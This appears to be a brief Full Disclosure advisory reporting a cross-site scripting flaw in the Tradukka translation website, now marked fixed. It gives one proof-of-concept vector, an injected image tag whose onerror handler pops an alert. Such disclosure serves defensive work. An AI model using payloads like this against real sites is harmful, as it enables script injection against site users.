Full Disclosure

Tradukka affected by Cross-Site Scripting

Leave a comment

Posted by Francisco Javier Santiago Vázquez on Apr 04

I. VULNERABILITY
————————-
Vulnerability Cross-Site Scripting (XSS)

II. PROOF OF CONCEPT
————————-
URL: http://tradukka.com/translate/en/es/
State: Fix & Patch
Vector: ‘><img src=x onerror=alert(“XSS”);>

III. SYSTEMS AFFECTED
————————-
The vulnerability affects the Translator Tradukka: http://tradukka.com

IV. CREDITS
————————-
These vulnerabilities have…

Leave a Reply